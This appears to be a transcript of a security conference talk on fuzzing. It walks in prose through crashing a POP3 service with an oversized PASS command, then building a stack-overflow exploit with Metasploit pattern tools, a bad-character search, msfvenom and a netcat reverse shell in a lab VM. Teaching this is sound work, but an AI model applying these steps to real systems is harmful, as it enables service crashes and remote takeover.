Fuzzing: Finding Your Own Bugs and 0days

Hello, everyone. Welcome aboard to my talk. I'm glad to be here with you all. My talk is about Fuzzing: Finding Your Own Bugs and 0days! My name is Rodolpho Concorde but you can call me by my nickname, ROd0X. A little about me. I'm a penetration tester, instructor in I.T., Consultant of information security for 13 years. I'm a certified ethical hacker by EC-Council. I've already gave talks at Hack In The Box, Arab Security Conference, MorterueloCON, Red Team Village, StackConf, BSides Athens, BSides Newcastle, BSides SATX and etc etc. I'm the author of Hakin9 magazine about Stack Overflow and Pentest Magazine about Covert Channel from Fuzzing to Get a Shell, from SEH Overwrite to Get a Shell. I leave here my LinkedIn profile and email for whoever wants to get in touch with me and take out some doubts.

You can write for me at my LinkedIn profile or my email. Our agenda about Fuzzing: we'll see types of targets, types of attacks, smart fuzzers, buffer overflows, and we have a PoC. Types of targets might be Protocol, Application or File Format. Protocol: FTP, POP3, SMTP, Telnet, anyone, any protocol. Application: any input of any application. File format: Any file format like .MP3, .M3U, .MP4 etc etc for test the software reader. Types of attacks: Fuzzers would try combinations of attacks on numbers, chars, metadata, pure binary sequences, is sent for the target one list with sequence of dangerous strings. And here we have some examples of the dangerous strings. Types of fuzzers: might be dumb or smart fuzzers. Dumb: any string combination.

Smart Fuzzing: Smart fuzzers are programmed with knowledge of the input formats, i.e., a protocol definition or rules for a file format. Might be mutation, generation or evolutionary. Smart Fuzzing is a long subject and we don't have time to getting down in depth in this subject. But I leave here the F-Secure website link with more information about smart fuzzing. Buffer Overflow: Buffer Overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Might be heap-based and stack-based. Heap-based: place in the memory which allocates lot amount of data dynamically. Stack-based: allocate a limited or fixed size of data, such as data from local variables or functions.

Here we have a buffer overflow code example. In this code, we have variable buffer with size 5 bytes of data. And what is the problem with this code? The problem with this code is it doesn't verify what it should do if someone inserts more than 5 bytes. So if someone inserts more than 5 bytes, the application would occur an overflow. The application gets a crash because this application isn't prepared for what happens if someone inserts more than 5 bytes. Now we will see a PoC: Discovery INPUT format to realize the fuzz. Example of the protocol POP3. Here we see in this code a code of a fuzzing script, a Python fuzzing script. We have here variable buffer with character A, variable counter on 100.

And we have here connecting to target IP on port 110. And we have below command USER and command PASS. What will happen with this code? This code will send a lot amount of character A against the target IP and port 110 and command PASS. Command USER and command PASS is specified in the RFC 1081 document Protocol POP3. Other protocols use other commands. Each protocol has its own commands. We will send a lot amount of character A against the command PASS with objective to cause a crash in this application. So let's see the video PoC. In this video, we will see through an NMAP command against the target IP to witness open ports. As we can see, port 110 is open. Protocol POP3 is running on port 110.

Now let's see our Python fuzzing script. We will send character A from 100 bytes and increasing. Objective cause a crash in this application. Let's run the Python fuzzing script. As we can see, it was necessary 5,900 bytes to cause a crash in this application. Let's run the NMAP command again. Port 110 is now down because of our script. Here we have a vulnerable software to download. I'll make available on my LinkedIn profile the link for these slides for whoever wants to see them again. Now we see another video PoC. We will open the vulnerable software in Immunity Debugger. In this PoC, we will teach how you can create your own exploit code made through fuzzing.

Sending a lot of characters to get a shell. This lot amount of characters will be load in a vulnerable software to cause a crash. We have an output file generated. We will use a tool called Pattern Create from Metasploit to generate a lot amount of characters. Length 50,000 bytes. We will copy this characters and paste on our exploit code. Objective is cause a crash in this vulnerable software. Use this to find the offset of register EIP. Let's move our exploit code to a desktop and copy to a victim VM. Open Immunity Debugger on victim VM and run the vulnerable software. Attach vulnerable software in Debugger and run it. Let's load the characters. We got a crash. Let's see register ESP and EIP.

We use value in EIP to find the offset. Register EIP indicates the next address that the CPU will execute. We find offset 35,056 bytes. We use a tool Pattern Offset from Metasploit to localized the offset. Junk is 35,056 characters A. Register EIP indicates address and register ESP contains the shellcode. Now we need search for bad characters. Depending on the application, some characters are considered bad. Example: 0x00 is Considered bad because it terminates a string copy. We load the characters 01 up to FF against target. See if there is an error in Immunity Dump. Find bad characters to avoid when we create our shellcode. Bad characters: 0x00, 0x0A. We use MSFVENOM to generate a reverse shell. Avoid bad characters with -B option.

Open exploit code, Paste characters A for junk, Jump IP address, some Nops and the MSF shellcode. Put netcat to listen on victim VM. Load exploit and witness the connection back. We got a shell! Let's check IP and users. We have a reverse shell access on victim VM. Thank everyone for watching me. Now I open for the questions. Thank you very much.